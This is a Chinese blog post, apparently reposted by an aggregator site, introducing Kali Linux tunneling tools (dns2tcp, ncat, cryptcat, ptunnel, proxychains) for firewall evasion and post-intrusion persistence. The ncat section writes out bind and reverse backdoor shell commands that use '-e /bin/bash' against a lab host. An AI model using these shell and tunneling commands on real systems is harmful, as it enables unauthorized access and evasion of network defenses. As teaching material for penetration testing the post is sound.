2016.6.17 kali Linux 隧道工具

Posted 小春熙子

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了2016.6.17 kali Linux 隧道工具相关的知识,希望对你有一定的参考价值。

隧道工具的基本概念:

1.在计算机网络中,隧道工具是指使用一种网络协议去封装另一种网络协议的技术。

2.通常用来数据伪装或者穿越防火墙,在入侵目标系统后,可用来提升权限和权限维持。

 

Kali中的隧道工具介绍:

(1)dns2TCP

**是一种把tcp数据包封装成DNS协议数据包的封装工具,适用于目标主机只能发送DNS请求的网络;

**客户端:dns2tcpc

**服务端:dns2tcpd

**缺点:需要有自己的域名,配置dns

(2)iodline

**相比dns2tcp功能更强大,支持协议更多。

(3)Ncat/netcat

**Ncat是Netcat程序的改进版本,功能强大;

**可用于web服务程序和其他tcp/ip协议的客户端;

**简单tcp/udp/sctp/ssl服务端程序;

**转发代理tcp/udp/sctp流量;

**执行系统指令的网络网关;

**使用ssl加密通信数据;

**作为连接代理;

(4)ncat

**创建正向连接back door shell

**创建反向连接back door shell

**正向连接(目标机器在公网,而我们自己在局域网中):

终端输入:ncat -l 1337 -e /bin/bash   //-l参数是listen监听1337端口 -e参数是要执行的shell在bash目录下

在目标主机(192.168.1.103)上中连接:ncat 192.168.1.104   1337   //104是服务器端地址

连接后就有权限操作目标主机的shell了

 

**反向连接(目标主机在局域网内,而我们具有公网ip)

**或者我们和目标主机都在各自内网中,这时一般做反弹连接,反弹到我们这边的网关或者路由器上的ip地址因为它们有公网ip,然后我们需要在路由器或网关上做指定端口向内网主机指定端口映射:

在攻击主机终端输入:ncat -l 1337  //启动监听1337端口就好

在目标主机终端输入:ncat   192.168.1.104  -e  /bin/bash    //指定反弹的ip地址(即监听机的ip地址),-e参数指定反弹连接后监听机可以启用的shell

 

(5)cryptcat

**cryptcat是经典的网络工具netcat的加密版,使用twoflish加密算法,其密钥协商过程基于发送,接收双发共享的一个password

**-k指定密码

**-h参数可以看使用参数  -l指定为监听模式  -p指定监听的端口  -s指定监听的ip地址

 

(6)ICMP隧道工具ptunnel

**使用icmp封装tcp连接的隧道工具

**服务器端:ptunnel

**客户端:ptunnel -p 192.168.1.104(服务器端地址)  -lp  4567(服务器本地端口)  -da  192.168.1.103(目标主机)  -dp 22(目标主机端口)

**ssh命令访问192.168.1.103的主机时,端口转发使命令先转发到192.168.1.104的4567端口上,然后在转发到192.168.1.103的22端口上

(7)通过代理服务器创建隧道

**搭建socks5代理服务器。

**通过代理搭建隧道。

 

(8)Proxychains工具

**适用于通过代理服务器访问外部网络的情况;

**穿过外联端口的防火墙;

**组成代理服务器链;

**将没有代理的功能的应用使用代理对外链接。telnet。ftp。wget。等

以上是关于2016.6.17 kali Linux 隧道工具的主要内容,如果未能解决你的问题,请参考以下文章

Kali设置代理

Kali-linux设置ProxyChains

Kali的内网变外网

DNS隧道实验

DNS隧道实验

内网基础-隧道技术内网穿透(SSH隧道Socket隧道跨路由扫描)